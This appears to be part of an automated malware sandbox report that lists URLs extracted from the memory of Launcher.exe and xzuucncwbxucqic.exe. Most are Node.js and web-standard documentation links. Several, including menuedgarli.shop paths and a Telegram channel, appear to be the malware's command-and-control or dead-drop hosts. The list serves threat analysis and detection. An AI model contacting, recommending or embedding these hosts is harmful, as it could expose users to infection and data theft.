                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#Replaceable
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1562259858.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1756162409.00000000015D7000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384478764.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://jimmy.warting.se/opensource
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.2384299612.0000000001548000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384478764.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/AUIqn
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/AUIqn)
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1756162409.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/AUIqnl
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.2384299612.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/AUIqnq
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/M4
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/eE4
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1713028166.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/s
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1713028166.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/sU4
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1562316522.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop:443/AUIqn
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://no-color.org/
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2-headers.tar.gz
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2.tar.gz
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2.tar.gzhttps://nodejs.org/download/release
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/win-x86/node.lib
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspector
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspectorFor
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.ico
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.iconodedevtoolsFrontendUrldevtoolsFrontendUrlCompa
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1424623663.0000000001587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/asdawfq
                      Source: svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000001.00000002.1366712634.000001A164E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000001.00000002.1366712634.000001A164E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
                      Source: svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url-serializing
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://v8.dev/blog/v8-release-89
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1424697128.0000000001554000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1424623663.0000000001587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1424697128.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=57b9635b1734ac47b1_164579754652
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1424697128.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1756162409.00000000015D7000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384478764.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
